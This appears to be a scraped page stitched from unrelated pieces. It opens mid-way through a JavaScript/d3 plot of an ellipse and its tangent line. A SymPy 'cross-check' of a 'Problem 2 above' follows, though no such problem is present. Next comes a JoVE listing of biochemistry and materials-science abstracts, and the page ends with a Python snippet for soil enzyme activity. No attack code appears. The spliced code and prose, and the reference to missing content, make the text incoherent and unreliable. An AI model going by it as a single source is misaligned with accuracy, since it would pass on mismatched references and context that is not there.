        input_x1 = document.querySelector('#x1'),
        input_x2 = document.querySelector('#x2'),
        input_y1 = document.querySelector('#y1'),
        input_y2 = document.querySelector('#y2'),
        input_a0 = document.querySelector('#a0'),
        input_b0 = document.querySelector('#b0'),
        input_x0 = document.querySelector('#x0'),
        input_y0 = document.querySelector('#y0'),
        inputs = [input_r, input_dx, input_x1, input_x2, input_y1, input_y2,
                  input_a0, input_b0, input_x0, input_y0],
        p = (x) => pre0.textContent += x + '\n',
        range = (start, end, step=1) => {
            let res = [];
            for (let i = start; i < end; i += step) {
                res.push(i);
            }
            return res;
        };

    let draw = () => {
        pre0.textContent = '';
        let r = parseFloat(input_r.value),
            dx = parseFloat(input_dx.value),
            x1 = parseFloat(input_x1.value),
            x2 = parseFloat(input_x2.value),
            y1 = parseFloat(input_y1.value),
            y2 = parseFloat(input_y2.value),
            a0 = parseFloat(input_a0.value),
            b0 = parseFloat(input_b0.value),
            x0 = parseFloat(input_x0.value),
            y0 = parseFloat(input_y0.value);

        if (r === 0 || dx === 0 || x1 > x2 || y1 > y2) {
            return;
        }
        if (x0 ** 2 / a0 ** 2 + y0 ** 2 / b0 ** 2 !== 1) {
            p(`The point (${x0}, ${y0}) is not on the ellipse`);
        }
        let points = [],
            lines = [],
            f1 = (x) => -b0 * Math.sqrt(a0 ** 2 - x ** 2) / a0,
            f2 = (x) => -f1(x),
            g = (x) => b0 ** 2 * (a0 ** 2 - x * x0) / (a0 ** 2 * y0),
            fns = [[f1, 'red'], [f2, 'red'], [g, 'green']];

        fns.forEach((o) => {
            let [fn, color] = o;
            for (let x = x1; x <= x2; x += dx) {
                let y = fn(x);
                if (Math.abs(y) < Infinity) {
                    points.push([x, y, color]);
                }
            }
        });
        let xscale = d3.scaleLinear()
            .domain([x1, x2])
            .range([padding, width - padding]);
        let yscale = d3.scaleLinear()
            .domain([y1, y2])
            .range([height - padding, padding]);
        let xaxis = d3.axisBottom().scale(xscale);
        let yaxis = d3.axisLeft().scale(yscale);

        div0.innerHTML = '';
        let svg = d3.select('#graph0')
            .append('svg')
            .attr('width', width)
            .attr('height', height);

        svg.selectAll('circle')
            .data(points)
            .enter()
            .append('circle')
            .attr('cx', (d) => xscale(d[0]))
            .attr('cy', (d) => yscale(d[1]))
            .attr('r', r)
            .attr('fill', (d) => d[2] || 'green');

        svg.selectAll('line')
            .data([[x1, 0, x2, 0], [0, y1, 0, y2]].concat(lines))
            .enter()
            .append('line')
            .attr('x1', (d) => xscale(d[0]))
            .attr('y1', (d) => yscale(d[1]))
            .attr('x2', (d) => xscale(d[2]))
            .attr('y2', (d) => yscale(d[3]))
            .attr('stroke', (d) => d[4] || 'black');

        svg.append('g')
            .attr('transform', `translate(0, ${height - padding})`)
            .call(xaxis);
        svg.append('g')
            .attr('transform', `translate(${padding}, 0)`)
            .call(yaxis);

        p(fns.join('\n'));
    };

    inputs.forEach((input) => input.onchange = draw);
    btn0.onclick = draw;
    btn1.onclick = () => pre0.textContent = '';
    draw();
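As a quick cross-check of Problem 2 above, the gradient used for the tangent plane can be recomputed with SymPy. This snippet is not from the original post; it just verifies the hand computation (the expected output is shown in a comment):

    from sympy import symbols, diff

    x, y, z = symbols('x y z')
    g = x**2 + y**2 - z  # Problem 2: the surface z = x^2 + y^2 written as g(x, y, z) = 0

    grad_g = [diff(g, v) for v in (x, y, z)]
    point = {x: 1, y: -2, z: 5}
    print([component.subs(point) for component in grad_g])  # [2, -4, -1]

Dotting (2, -4, -1) with (x - 1, y + 2, z - 5) and setting the result to zero reproduces the tangent plane 2x - 4y - z = 5.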
JoVE Visualize

PubMed article: A biochemical genomics screen for substrates of Ste20p kinase enables the in silico prediction of novel substrates. PLoS ONE. Published: 08-17-2009.

The Ste20/PAK family is involved in many cellular processes, including the regulation of actin-based cytoskeletal dynamics and the activation of MAPK signaling pathways. Despite its numerous roles, few of its substrates have been identified. To better characterize the roles of the yeast Ste20p kinase, we developed an in vitro biochemical genomics screen to identify its substrates. When applied to 539 purified yeast proteins, the screen reported 14 targets of Ste20p phosphorylation. We used the data resulting from our screen to build an in silico predictor to identify Ste20p substrates on a proteome-wide basis. Since kinase-substrate specificity is often mediated by additional binding events at sites distal to the phosphorylation site, the predictor uses the presence/absence of multiple sequence motifs to evaluate potential substrates. Statistical validation estimates a threefold improvement in substrate recovery over random predictions, despite the lack of a single dominant motif that can characterize Ste20p phosphorylation. The set of predicted substrates significantly overrepresents elements of the genetic and physical interaction networks surrounding Ste20p, suggesting that some of the predicted substrates are in vivo targets. We validated this combined experimental and computational approach for identifying kinase substrates by confirming the in vitro phosphorylation of polarisome components Bni1p and Bud6p, thus suggesting a mechanism by which Ste20p effects polarized growth.

Authors: Srikanth Kudithipudi, Denis Kusevic, Sara Weirich, Albert Jeltsch. Published: 11-29-2014.

Abstract: Lysine methylation is an emerging post-translational modification that has been identified on several histone and non-histone proteins, where it plays crucial roles in cell development and many diseases. Approximately 5,000 lysine methylation sites have been identified on different proteins, which are set by a few dozen protein lysine methyltransferases (PKMTs). This suggests that each PKMT methylates multiple proteins, yet until now only one or two substrates have been identified for several of these enzymes. To approach this problem, we have introduced peptide-array-based substrate specificity analyses of PKMTs. Peptide arrays are powerful tools for characterizing the specificity of PKMTs because the methylation of several substrates with different sequences can be tested on one array. We synthesized peptide arrays on cellulose membranes using an Intavis SPOT synthesizer and analyzed the specificity of various PKMTs. Based on the results, novel substrates could be identified for several of these enzymes. For example, by employing peptide arrays we showed that NSD1 methylates K44 of H4 instead of the reported H4K20, and that H1.5K168 is its highly preferred substrate over the previously known H3K36. Hence, peptide arrays are powerful tools for biochemically characterizing PKMTs.

24 Related JoVE Articles

In vitro Methylation Assay to Study Protein Arginine Methylation
Authors: Rama Kamesh Bikkavilli, Sreedevi Avasarala, Michelle Van Scoyk, Manoj Kumar Karuppusamy Rathinam, Jordi Tauler, Stanley Borowicz, Robert A. Winn.
Institutions: University of Illinois at Chicago, University of Illinois at Chicago, Jesse Brown Veterans Affairs Medical Center.
Protein arginine methylation is one of the most abundant post-translational modifications in the nucleus. Protein arginine methylation can be identified and/or determined via proteomic approaches and/or immunoblotting with methyl-arginine-specific antibodies. However, these techniques can sometimes be misleading and often provide false-positive results. Most importantly, these techniques cannot provide direct evidence in support of PRMT substrate specificity. In vitro methylation assays, on the other hand, are useful biochemical assays that are sensitive and consistently reveal whether the identified proteins are indeed PRMT substrates. A typical in vitro methylation assay includes purified, active PRMTs, purified substrate, and a radioisotope-labeled methyl donor (S-adenosyl-L-[methyl-3H] methionine). Here we describe a step-by-step protocol to isolate catalytically active PRMT1, a ubiquitously expressed PRMT family member. The methyltransferase activities of the purified PRMT1 were later tested on Ras-GTPase activating protein binding protein 1 (G3BP1), a known PRMT substrate, in the presence of S-adenosyl-L-[methyl-3H] methionine as the methyl donor. This protocol can be employed not only for establishing the methylation status of novel physiological PRMT1 substrates, but also for understanding the basic mechanism of protein arginine methylation.

Keywords: Genetics, Issue 92, PRMT, protein methylation, SAMe, arginine, methylated proteins, methylation assay

Pull-down of Calmodulin-binding Proteins
Authors: Kanwardeep S. Kaleka, Amber N. Petersen, Matthew A. Florence, Nashaat Z. Gerges.
Institutions: Medical College of Wisconsin.

Calcium (Ca2+) is an ion vital in regulating cellular function through a variety of mechanisms. Much of Ca2+ signaling is mediated through the calcium-binding protein known as calmodulin (CaM) [1,2]. CaM is involved at multiple levels in almost all cellular processes, including apoptosis, metabolism, smooth muscle contraction, synaptic plasticity, nerve growth, inflammation, and the immune response. A number of proteins help regulate these pathways through their interaction with CaM. Many of these interactions depend on the conformation of CaM, which is distinctly different when bound to Ca2+ (Ca2+-CaM) as opposed to its Ca2+-free state (ApoCaM) [3]. While most target proteins bind Ca2+-CaM, certain proteins only bind to ApoCaM. Some bind CaM through their IQ-domain, including neuromodulin [4], neurogranin (Ng) [5], and certain myosins [6]. These proteins have been shown to play important roles in presynaptic function [7], postsynaptic function [8], and muscle contraction [9], respectively. Their ability to bind and release CaM in the absence or presence of Ca2+ is pivotal in their function. In contrast, many proteins only bind Ca2+-CaM and require this binding for their activation. Examples include myosin light chain kinase [10], Ca2+/CaM-dependent kinases (CaMKs) [11] and phosphatases (e.g. calcineurin) [12], and spectrin kinase [13], which have a variety of direct and downstream effects [14]. The effects of these proteins on cellular function are often dependent on their ability to bind to CaM in a Ca2+-dependent manner. For example, we tested the relevance of Ng-CaM binding in synaptic function and how different mutations affect this binding.
The study of these different mutations gave us great insight into important processes involved in synaptic function [8,15]. However, in such studies, it is essential to demonstrate that the mutated proteins have the expected altered binding to CaM. Here, we present a method for testing the ability of proteins to bind to CaM in the presence or absence of Ca2+, using CaMKII and Ng as examples. This method is a form of affinity chromatography referred to as a CaM pull-down assay. It uses CaM-Sepharose beads to test proteins that bind to CaM and the influence of Ca2+ on this binding. It is considerably more time efficient and requires less protein relative to column chromatography and other assays. Altogether, this provides a valuable tool to explore Ca2+/CaM signaling and proteins that interact with CaM.

Keywords: Molecular Biology, Issue 59, Calmodulin, calcium, IQ-motif, affinity chromatography, pull-down, Ca2+/Calmodulin-dependent Kinase II, neurogranin

Direct Detection of the Acetate-forming Activity of the Enzyme Acetate Kinase
Authors: Matthew L. Fowler, Cheryl J. Ingram-Smith, Kerry S. Smith.
Institutions: Clemson University.

Acetate kinase, a member of the acetate and sugar kinase-Hsp70-actin (ASKHA) enzyme superfamily [1-5], is responsible for the reversible phosphorylation of acetate to acetyl phosphate utilizing ATP as a substrate. Acetate kinases are ubiquitous in the Bacteria, found in one genus of Archaea, and are also present in microbes of the Eukarya [6]. The most well characterized acetate kinase is that from the methane-producing archaeon Methanosarcina thermophila [7-14]. An acetate kinase which can only utilize PPi but not ATP in the acetyl phosphate-forming direction has been isolated from Entamoeba histolytica, the causative agent of amoebic dysentery, and has thus far only been found in this genus [15,16]. In the direction of acetyl phosphate formation, acetate kinase activity is typically measured using the hydroxamate assay, first described by Lipmann [17-20], a coupled assay in which conversion of ATP to ADP is coupled to oxidation of NADH to NAD+ by the enzymes pyruvate kinase and lactate dehydrogenase [21,22], or an assay measuring release of inorganic phosphate after reaction of the acetyl phosphate product with hydroxylamine [23]. Activity in the opposite, acetate-forming direction is measured by coupling ATP formation from ADP to the reduction of NADP+ to NADPH by the enzymes hexokinase and glucose 6-phosphate dehydrogenase [24]. Here we describe a method for the detection of acetate kinase activity in the direction of acetate formation that does not require coupling enzymes, but is instead based on direct determination of acetyl phosphate consumption. After the enzymatic reaction, remaining acetyl phosphate is converted to a ferric hydroxamate complex that can be measured spectrophotometrically, as for the hydroxamate assay. Thus, unlike the standard coupled assay for this direction that is dependent on the production of ATP from ADP, this direct assay can be used for acetate kinases that produce ATP or PPi.

Keywords: Molecular Biology, Issue 58, Acetate kinase, acetate, acetyl phosphate, pyrophosphate, PPi, ATP

Identifying Protein-protein Interaction Sites Using Peptide Arrays
Authors: Hadar Amartely, Anat Iosub-Amir, Assaf Friedler.
Institutions: The Hebrew University of Jerusalem.

Protein-protein interactions mediate most of the processes in the living cell and control homeostasis of the organism.
Impaired protein interactions may result in disease, making protein interactions important drug targets. It is thus highly important to understand these interactions at the molecular level. Protein interactions are studied using a variety of techniques ranging from cellular and biochemical assays to quantitative biophysical assays, and these may be performed either with full-length proteins, with protein domains, or with peptides. Peptides serve as excellent tools to study protein interactions since peptides can be easily synthesized and allow focusing on specific interaction sites. Peptide arrays enable the identification of the interaction sites between two proteins as well as screening for peptides that bind the target protein for therapeutic purposes. They also allow high-throughput SAR studies. For identification of binding sites, a typical peptide array usually contains partly overlapping 10-20-residue peptides derived from the full sequences of one or more partner proteins of the desired target protein. Screening the array for binding the target protein reveals the binding peptides, corresponding to the binding sites in the partner proteins, in an easy and fast method using only a small amount of protein. In this article we describe a protocol for screening peptide arrays for mapping the interaction sites between a target protein and its partners. The peptide array is designed based on the sequences of the partner proteins, taking into account their secondary structures. The arrays used in this protocol were Celluspots arrays prepared by INTAVIS Bioanalytical Instruments. The array is blocked to prevent unspecific binding and then incubated with the studied protein. Detection using an antibody reveals the binding peptides corresponding to the specific interaction sites between the proteins.

Keywords: Molecular Biology, Issue 93, peptides, peptide arrays, protein-protein interactions, binding sites, peptide synthesis, micro-arrays

A High Throughput MHC II Binding Assay for Quantitative Analysis of Peptide Epitopes
Authors: Regina Salvat, Leonard Moise, Chris Bailey-Kellogg, Karl E. Griswold.
Institutions: Dartmouth College, University of Rhode Island, Dartmouth College.

Biochemical assays with recombinant human MHC II molecules can provide rapid, quantitative insights into immunogenic epitope identification, deletion, or design [1,2]. Here, a peptide-MHC II binding assay is scaled to 384-well format. The scaled-down protocol reduces reagent costs by 75% and is higher throughput than previously described 96-well protocols [1,3-5]. Specifically, the experimental design permits robust and reproducible analysis of up to 15 peptides against one MHC II allele per 384-well ELISA plate. Using a single liquid handling robot, this method allows one researcher to analyze approximately ninety test peptides in triplicate over a range of eight concentrations and four MHC II allele types in less than 48 hr. Others working in the fields of protein deimmunization or vaccine design and development may find the protocol to be useful in facilitating their own work. In particular, the step-by-step instructions and the visual format of JoVE should allow other users to quickly and easily establish this methodology in their own labs.
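The throughput figures quoted above are consistent with simple well-count arithmetic. The plate layout below is an assumption for illustration only, not taken from the protocol:

    # 15 test peptides x 8 concentrations x 3 replicates per 384-well plate
    # (layout assumed for illustration; remaining wells would be free for controls).
    wells_needed = 15 * 8 * 3
    print(wells_needed, wells_needed <= 384)  # 360 True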
Keywords: Biochemistry, Issue 85, Immunoassay, Protein Immunogenicity, MHC II, T cell epitope, High Throughput Screen, Deimmunization, Vaccine Design

Fabricating Complex Culture Substrates Using Robotic Microcontact Printing (R-µCP) and Sequential Nucleophilic Substitution
Authors: Gavin T. Knight, Tyler Klann, Jason D. McNulty, Randolph S. Ashton.
Institutions: University of Wisconsin, Madison, University of Wisconsin, Madison.

In tissue engineering, it is desirable to exhibit spatial control of tissue morphology and cell fate in culture on the micron scale. Culture substrates presenting grafted poly(ethylene glycol) (PEG) brushes can be used to achieve this task by creating microscale, non-fouling and cell adhesion resistant regions as well as regions where cells participate in biospecific interactions with covalently tethered ligands. To engineer complex tissues using such substrates, it will be necessary to sequentially pattern multiple PEG brushes functionalized to confer differential bioactivities and aligned in microscale orientations that mimic in vivo niches. Microcontact printing (µCP) is a versatile technique to pattern such grafted PEG brushes, but manual µCP cannot be performed with microscale precision. Thus, we combined advanced robotics with soft-lithography techniques and emerging surface chemistry reactions to develop a robotic microcontact printing (R-µCP)-assisted method for fabricating culture substrates with complex, microscale, and highly ordered patterns of PEG brushes presenting orthogonal 'click' chemistries. Here, we describe in detail the workflow to manufacture such substrates.

Keywords: Bioengineering, Issue 92, Robotic microcontact printing, R-µCP, click chemistry, surface chemistry, tissue engineering, micropattern, advanced manufacturing

Atomically Defined Templates for Epitaxial Growth of Complex Oxide Thin Films
Authors: A. Petra Dral, David Dubbink, Maarten Nijland, Johan E. ten Elshof, Guus Rijnders, Gertjan Koster.
Institutions: University of Twente.

Atomically defined substrate surfaces are prerequisite for the epitaxial growth of complex oxide thin films. In this protocol, two approaches to obtain such surfaces are described. The first approach is the preparation of single-terminated perovskite SrTiO3 (001) and DyScO3 (110) substrates. Wet etching was used to selectively remove one of the two possible surface terminations, while an annealing step was used to increase the smoothness of the surface. The resulting single-terminated surfaces allow for the heteroepitaxial growth of perovskite oxide thin films with high crystalline quality and well-defined interfaces between substrate and film. In the second approach, seed layers for epitaxial film growth on arbitrary substrates were created by Langmuir-Blodgett (LB) deposition of nanosheets. As a model system, Ca2Nb3O10⁻ nanosheets were used, prepared by delamination of their layered parent compound HCa2Nb3O10. A key advantage of creating seed layers with nanosheets is that relatively expensive and size-limited single crystalline substrates can be replaced by virtually any substrate material.

Keywords: Chemistry, Issue 94, Substrates, oxides, perovskites, epitaxy, thin films, single termination, surface treatment, nanosheets, Langmuir-Blodgett

Nucleoside Triphosphates - From Synthesis to Biochemical Characterization
Authors: Marcel Hollenstein, Christine Catherine Smith, Michael Räz.
Institutions: University of Bern.
The traditional strategy for the introduction of chemical functionalities is the use of solid-phase synthesis by appending suitably modified phosphoramidite precursors to the nascent chain. However, the conditions used during the synthesis and the restriction to rather short sequences hamper the applicability of this methodology. On the other hand, modified nucleoside triphosphates are activated building blocks that have been employed for the mild introduction of numerous functional groups into nucleic acids, a strategy that paves the way for the use of modified nucleic acids in a wide-ranging palette of practical applications such as functional tagging and the generation of ribozymes and DNAzymes. One of the major challenges resides in the intricacy of the methodology leading to the isolation and characterization of these nucleoside analogues. In this video article, we present a detailed protocol for the synthesis of these modified analogues using phosphorus(III)-based reagents. In addition, the procedure for their biochemical characterization is divulged, with a special emphasis on primer extension reactions and TdT tailing polymerization. This detailed protocol will be of use for the crafting of modified dNTPs and their further use in chemical biology.

Keywords: Chemistry, Issue 86, Nucleic acid analogues, Bioorganic Chemistry, PCR, primer extension reactions, organic synthesis, PAGE, HPLC, nucleoside triphosphates

An Inverse Analysis Approach to the Characterization of Chemical Transport in Paints
Authors: Matthew P. Willis, Shawn M. Stevenson, Thomas P. Pearl, Brent A. Mantooth.
Institutions: U.S. Army Edgewood Chemical Biological Center, OptiMetrics, Inc., a DCS Company.

The ability to directly characterize chemical transport and interactions that occur within a material (i.e., subsurface dynamics) is a vital component in understanding contaminant mass transport and the ability to decontaminate materials. If a material is contaminated, over time, the transport of highly toxic chemicals (such as chemical warfare agent species) out of the material can result in vapor exposure or transfer to the skin, which can result in percutaneous exposure to personnel who interact with the material. Due to the high toxicity of chemical warfare agents, the release of trace chemical quantities is of significant concern. Mapping subsurface concentration distribution and transport characteristics of absorbed agents enables exposure hazards to be assessed in untested conditions. Furthermore, these tools can be used to characterize subsurface reaction dynamics to ultimately design improved decontaminants or decontamination procedures. To achieve this goal, an inverse analysis mass transport modeling approach was developed that utilizes time-resolved mass spectroscopy measurements of vapor emission from contaminated paint coatings as the input parameter for calculation of subsurface concentration profiles. Details are provided on sample preparation, including contaminant and material handling, the application of mass spectrometry for the measurement of emitted contaminant vapor, and the implementation of inverse analysis using a physics-based diffusion model to determine transport properties of live chemical warfare agents including distilled mustard (HD) and the nerve agent VX.
Keywords: Chemistry, Issue 90, Vacuum, vapor emission, chemical warfare agent, contamination, mass transport, inverse analysis, volatile organic compound, paint, coating

A Toolkit to Enable Hydrocarbon Conversion in Aqueous Environments
Authors: Eva K. Brinkman, Kira Schipper, Nadine Bongaerts, Mathias J. Voges, Alessandro Abate, S. Aljoscha Wahl.
Institutions: Delft University of Technology, Delft University of Technology.

This work puts forward a toolkit that enables the conversion of alkanes by Escherichia coli and presents a proof of principle of its applicability. The toolkit consists of multiple standard interchangeable parts (BioBricks) [9] addressing the conversion of alkanes, regulation of gene expression, and survival in toxic hydrocarbon-rich environments. A three-step pathway for alkane degradation was implemented in E. coli to enable the conversion of medium- and long-chain alkanes to their respective alkanols, alkanals, and ultimately alkanoic acids. The latter were metabolized via the native β-oxidation pathway. To facilitate the oxidation of medium-chain alkanes (C5-C13) and cycloalkanes (C5-C8), four genes (alkB2, rubA3, rubA4 and rubB) of the alkane hydroxylase system from Gordonia sp. TF6 [8,21] were transformed into E. coli. For the conversion of long-chain alkanes (C15-C36), the ladA gene from Geobacillus thermodenitrificans was implemented. For the required further steps of the degradation process, ADH and ALDH (originating from G. thermodenitrificans) were introduced [10,11]. The activity was measured by resting cell assays. For each oxidative step, enzyme activity was observed. To optimize the process efficiency, the expression was only induced under low glucose conditions: a substrate-regulated promoter, pCaiF, was used. pCaiF is present in E. coli K12 and regulates the expression of the genes involved in the degradation of non-glucose carbon sources. The last part of the toolkit - targeting survival - was implemented using solvent tolerance genes, PhPFDα and β, both from Pyrococcus horikoshii OT3. Organic solvents can induce cell stress and decreased survivability by negatively affecting protein folding. As chaperones, PhPFDα and β improve the protein folding process, e.g. in the presence of alkanes. The expression of these genes led to an improved hydrocarbon tolerance, shown by an increased growth rate (up to 50%) in the presence of 10% n-hexane in the culture medium. Summarizing, the results indicate that the toolkit enables E. coli to convert and tolerate hydrocarbons in aqueous environments. As such, it represents an initial step towards a sustainable solution for oil remediation using a synthetic biology approach.

Keywords: Bioengineering, Issue 68, Microbiology, Biochemistry, Chemistry, Chemical Engineering, Oil remediation, alkane metabolism, alkane hydroxylase system, resting cell assay, prefoldin, Escherichia coli, synthetic biology, homologous interaction mapping, mathematical model, BioBrick, iGEM

Substrate Generation for Endonucleases of CRISPR/Cas Systems
Authors: Judith Zoephel, Srivatsa Dwarakanath, Hagen Richter, André Plagens, Lennart Randau.
Institutions: Max-Planck-Institute for Terrestrial Microbiology.

The interaction of viruses and their prokaryotic hosts shaped the evolution of bacterial and archaeal life. Prokaryotes developed several strategies to evade viral attacks that include restriction modification, abortive infection, and CRISPR/Cas systems.
These adaptive immune systems, found in many Bacteria and most Archaea, consist of clustered regularly interspaced short palindromic repeat (CRISPR) sequences and a number of CRISPR-associated (Cas) genes (Fig. 1) [1-3]. Different sets of Cas proteins and repeats define at least three major divergent types of CRISPR/Cas systems [4]. The universal proteins Cas1 and Cas2 are proposed to be involved in the uptake of viral DNA that will generate a new spacer element between two repeats at the 5' terminus of an extending CRISPR cluster [5]. The entire cluster is transcribed into a precursor crRNA containing all spacer and repeat sequences and is subsequently processed by an enzyme of the diverse Cas6 family into smaller crRNAs [6-8]. These crRNAs consist of the spacer sequence flanked by a 5' terminal tag (8 nucleotides) and a 3' terminal tag derived from the repeat sequence [9]. A repeated infection by the virus can now be blocked, as the new crRNA will be directed by a Cas protein complex (Cascade) to the viral DNA and identify it as such via base complementarity [10]. Finally, for CRISPR/Cas type 1 systems, the nuclease Cas3 will destroy the detected invader DNA [11,12]. These processes define CRISPR/Cas as an adaptive immune system of prokaryotes and opened a fascinating research field for the study of the involved Cas proteins. The function of many Cas proteins is still elusive, and the causes for the apparent diversity of the CRISPR/Cas systems remain to be illuminated. Potential activities of most Cas proteins were predicted via detailed computational analyses. A major fraction of Cas proteins are either shown or proposed to function as endonucleases [4]. Here, we present methods to generate crRNAs and precursor crRNAs for the study of Cas endoribonucleases. Different endonuclease assays require either short repeat sequences that can directly be synthesized as RNA oligonucleotides, or longer crRNA and pre-crRNA sequences that are generated via in vitro T7 RNA polymerase run-off transcription. This methodology allows the incorporation of radioactive nucleotides for the generation of internally labeled endonuclease substrates and the creation of synthetic or mutant crRNAs. Cas6 endonuclease activity is utilized to mature pre-crRNAs into crRNAs with 5'-hydroxyl and 2',3'-cyclic phosphate termini.

Keywords: Molecular Biology, Issue 67, CRISPR/Cas, endonuclease, in vitro transcription, crRNA, Cas6

Assaying the Kinase Activity of LRRK2 in vitro
Authors: Patrick A. Lewis.
Institutions: UCL Institute of Neurology.

Leucine Rich Repeat Kinase 2 (LRRK2) is a 2527 amino acid member of the ROCO family of proteins, possessing a complex, multidomain structure including a GTPase domain (termed ROC, for Ras of Complex proteins) and a kinase domain [1]. The discovery in 2004 of mutations in LRRK2 that cause Parkinson's disease (PD) resulted in LRRK2 being the focus of a huge volume of research into its normal function and how the protein goes awry in the disease state [2,3]. Initial investigations into the function of LRRK2 focused on its enzymatic activities [4-6]. Although a clear picture has yet to emerge of a consistent alteration in these due to mutations, data from a number of groups has highlighted the importance of the kinase activity of LRRK2 in cell death linked to mutations [7,8]. Recent publications have reported inhibitors targeting the kinase activity of LRRK2, providing a key experimental tool [9-11].
In light of these data, it is likely that the enzymatic properties of LRRK2 afford us an important window into the biology of this protein, although whether they are potential drug targets for Parkinson's is open to debate. A number of different approaches have been used to assay the kinase activity of LRRK2. Initially, assays were carried out using epitope-tagged protein overexpressed in mammalian cell lines and immunoprecipitated, with the assays carried out using this protein immobilised on agarose beads [4,5,7]. Subsequently, purified recombinant fragments of LRRK2 in solution have also been used, for example a GST-tagged fragment purified from insect cells containing residues 970 to 2527 of LRRK2 [12]. Recently, Daniëls et al. reported the isolation of full-length LRRK2 in solution from human embryonic kidney cells; however, this protein is not widely available [13]. In contrast, the GST fusion truncated form of LRRK2 is commercially available (from Invitrogen, see Table 1 for details), and provides a convenient tool for demonstrating an assay for LRRK2 kinase activity. Several different outputs for LRRK2 kinase activity have been reported. Autophosphorylation of LRRK2 itself, phosphorylation of Myelin Basic Protein (MBP) as a generic kinase substrate, and phosphorylation of an artificial substrate, dubbed LRRKtide, based upon phosphorylation of threonine 558 in Moesin, have all been used, as have a series of putative physiological substrates including α-synuclein, Moesin, and 4-EBP [14-17]. The status of these proteins as substrates for LRRK2 remains unclear, and as such the protocol described below will focus on using MBP as a generic substrate, noting the utility of this system to assay LRRK2 kinase activity directed against a range of potential substrates.

Keywords: Molecular Biology, Issue 59, Kinase, LRRK2, Parkinson's disease

DNA-affinity-purified Chip (DAP-chip) Method to Determine Gene Targets for Bacterial Two Component Regulatory Systems
Authors: Lara Rajeev, Eric G. Luning, Aindrila Mukhopadhyay.
Institutions: Lawrence Berkeley National Laboratory.

In vivo methods such as ChIP-chip are well-established techniques used to determine global gene targets for transcription factors. However, they are of limited use in exploring bacterial two component regulatory systems with uncharacterized activation conditions. Such systems regulate transcription only when activated in the presence of unique signals. Since these signals are often unknown, the in vitro microarray-based method described in this video article can be used to determine gene targets and binding sites for response regulators. This DNA-affinity-purified-chip method may be used for any purified regulator in any organism with a sequenced genome. The protocol involves allowing the purified tagged protein to bind to sheared genomic DNA and then affinity purifying the protein-bound DNA, followed by fluorescent labeling of the DNA and hybridization to a custom tiling array. Preceding steps that may be used to optimize the assay for specific regulators are also described. The peaks generated by the array data analysis are used to predict binding site motifs, which are then experimentally validated. The motif predictions can be further used to determine gene targets of orthologous response regulators in closely related species.
Protein WISDOM: A Workbench for In silico De novo Design of BioMolecules
Authors: James Smadbeck, Meghan B. Peterson, George A. Khoury, Martin S. Taylor, Christodoulos A. Floudas. Institutions: Princeton University.
The aim of de novo protein design is to find the amino acid sequences that will fold into a desired 3-dimensional structure with improvements in specific properties, such as binding affinity, agonist or antagonist behavior, or stability, relative to the native sequence. Protein design lies at the center of current advances in drug design and discovery. Not only does protein design provide predictions for potentially useful drug targets, but it also enhances our understanding of the protein folding process and of protein-protein interactions. Experimental methods such as directed evolution have shown success in protein design. However, such methods are restricted by the limited sequence space that can be searched tractably. In contrast, computational design strategies allow for the screening of a much larger set of sequences covering a wide variety of properties and functionality. We have developed a range of computational de novo protein design methods capable of tackling several important areas of protein design. These include the design of monomeric proteins for increased stability and of complexes for increased binding affinity. To disseminate these methods for broader use we present Protein WISDOM (http://www.proteinwisdom.org), a tool that provides automated methods for a variety of protein design problems. Structural templates are submitted to initialize the design process. The first stage of design is an optimization-based sequence selection stage that aims at improving stability through minimization of potential energy in the sequence space. Selected sequences are then run through a fold specificity stage and a binding affinity stage. A rank-ordered list of the sequences for each step of the process, along with relevant designed structures, provides the user with a comprehensive quantitative assessment of the design. Here we provide the details of each design method, as well as several notable experimental successes attained through the use of the methods. Genetics, Issue 77, Molecular Biology, Bioengineering, Biochemistry, Biomedical Engineering, Chemical Engineering, Computational Biology, Genomics, Proteomics, Protein, Protein Binding, Drug Design, optimization (mathematics), Amino Acids, Peptides, and Proteins, De novo protein and peptide design, In silico sequence selection, Fold specificity, Binding affinity, sequencing
High-throughput Fluorometric Measurement of Potential Soil Extracellular Enzyme Activities
Authors: Colin W. Bell, Barbara E. Fricks, Jennifer D. Rocca, Jessica M. Steinweg, Shawna K. McMahon, Matthew D. Wallenstein. Institutions: Colorado State University, Oak Ridge National Laboratory, University of Colorado.
Microbes in soils and other environments produce extracellular enzymes to depolymerize and hydrolyze organic macromolecules so that they can be assimilated for energy and nutrients. Measuring soil microbial enzyme activity is crucial to understanding soil ecosystem functional dynamics. The general concept of the fluorescence enzyme assay is that synthetic C-, N-, or P-rich substrates bound with a fluorescent dye are added to soil samples. When intact, the labeled substrates do not fluoresce. Enzyme activity is measured as the increase in fluorescence as the fluorescent dyes are cleaved from their substrates, which allows them to fluoresce. Enzyme measurements can be expressed in units of molarity or activity. To perform this assay, soil slurries are prepared by combining soil with a pH buffer. The pH buffer (typically a 50 mM sodium acetate or 50 mM Tris buffer) is chosen for its particular acid dissociation constant (pKa) to best match the soil sample pH. The soil slurries are inoculated with a nonlimiting amount of fluorescently labeled (i.e., C-, N-, or P-rich) substrate. Using soil slurries in the assay serves to minimize limitations on enzyme and substrate diffusion. The assay therefore controls for differences in substrate limitation, diffusion rates, and soil pH, so that the potential activity it detects reflects differences in enzyme concentration between samples. Fluorescence enzyme assays are typically more sensitive than spectrophotometric (i.e., colorimetric) assays, but can suffer from interference caused by impurities and from the instability of many fluorescent compounds when exposed to light, so caution is required when handling fluorescent substrates. Likewise, this method only assesses potential enzyme activities under laboratory conditions when substrates are not limiting. Caution should be used when interpreting data representing cross-site comparisons with differing temperatures or soil types, as in situ soil type and temperature can influence enzyme kinetics. Environmental Sciences, Issue 81, Ecological and Environmental Phenomena, Environment, Biochemistry, Environmental Microbiology, Soil Microbiology, Ecology, Eukaryota, Archaea, Bacteria, Soil extracellular enzyme activities (EEAs), fluorometric enzyme assays, substrate degradation, 4-methylumbelliferone (MUB), 7-amino-4-methylcoumarin (MUC), enzyme temperature kinetics, soil
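A minimal sketch of how such fluorescence readings are typically converted into potential activities (nmol of substrate cleaved per gram of dry soil per hour). The single-point MUB/MUC standard and the numbers are illustrative, and real workflows add quench and homogenate corrections beyond what is shown:

```python
def potential_activity(sample_fluor, soil_blank, substrate_blank,
                       standard_fluor, standard_nmol,
                       incubation_h, dry_soil_g):
    """Potential enzyme activity in nmol g^-1 dry soil h^-1."""
    # Net signal: subtract soil autofluorescence and substrate background.
    net = sample_fluor - soil_blank - substrate_blank
    # Emission coefficient: fluorescence units per nmol of free MUB/MUC.
    emission_coeff = standard_fluor / standard_nmol
    return net / emission_coeff / incubation_h / dry_soil_g

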